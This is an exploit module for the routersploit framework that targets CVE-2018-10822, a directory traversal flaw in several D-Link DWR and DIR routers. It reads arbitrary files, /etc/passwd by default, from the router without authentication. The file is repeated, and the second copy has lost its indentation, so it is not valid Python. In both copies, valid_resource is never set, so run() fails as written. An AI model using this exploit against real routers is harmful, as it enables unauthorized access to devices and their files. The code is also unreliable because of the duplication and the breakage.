paralax/dlink_dwr_dir_traversal.py

## dlink_dwr_dir_traversal.py
import random

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient

class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link router Directory Traversal",
        "description": """This module exploits a vulnerability in D-Link router httpd server. An unauthenticated attacker may read arbitrary files from the system.""",
        "authors": (
            "@jnazario",  # routersploit module
            'Blazej Adamczyk' # discovery and PoC
        ),
        "references": (
            "http://sploit.tech/2018/10/12/D-Link.html",
            "CVE-2018-10822"
        ),
        "devices": (
            'DWR-116 through 1.06',
            'DIR-140L through 1.02',
            'DIR-640L through 1.02',
            'DWR-512 through 2.02',
            'DWR-712 through 2.02',
            'DWR-912 through 2.02',
            'DWR-921 through 2.02',
            'DWR-111 through 1.01'
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def __init__(self):
        self.resources = (
            "/uir//{}",
        )

        self.valid_resource = None

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            path = self.valid_resource.format(self.filename)
            response = self.http_request(
                method="GET",
                path=path,
            )

            if response is None:
                print_error("Error with reading response")
                return

            if response.text:
                print_status("Reading file: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - empty response")

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(method='GET',
                                     path=self.basepath.rstrip('/') + '/uir')
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False
	import random

	from routersploit.core.exploit import *
	from routersploit.core.http.http_client import HTTPClient

	class Exploit(HTTPClient):
	__info__ = {
	"name": "D-Link router Directory Traversal",
	"description": """This module exploits a vulnerability in D-Link router httpd server. An unauthenticated attacker may read arbitrary files from the system.""",
	"authors": (
	"@jnazario", # routersploit module
	'Blazej Adamczyk' # discovery and PoC
	),
	"references": (
	"http://sploit.tech/2018/10/12/D-Link.html",
	"CVE-2018-10822"
	),
	"devices": (
	'DWR-116 through 1.06',
	'DIR-140L through 1.02',
	'DIR-640L through 1.02',
	'DWR-512 through 2.02',
	'DWR-712 through 2.02',
	'DWR-912 through 2.02',
	'DWR-921 through 2.02',
	'DWR-111 through 1.01'
	)
	}

	target = OptIP("", "Target IPv4 or IPv6 address")
	port = OptPort(80, "Target HTTP port")

	filename = OptString("/etc/passwd", "File to read from the filesystem")

	def __init__(self):
	self.resources = (
	"/uir//{}",
	)

	self.valid_resource = None

	def run(self):
	if self.check():
	print_success("Target appears to be vulnerable")
	path = self.valid_resource.format(self.filename)
	response = self.http_request(
	method="GET",
	path=path,
	)

	if response is None:
	print_error("Error with reading response")
	return

	if response.text:
	print_status("Reading file: {}".format(self.filename))
	print_info(response.text)
	else:
	print_error("Exploit failed - empty response")

	else:
	print_error("Exploit failed - target seems to be not vulnerable")

	@mute
	def check(self):
	response = self.http_request(method='GET',
	path=self.basepath.rstrip('/') + '/uir')
	if response is None:
	return False
	if response.status_code == 200:
	return True
	return False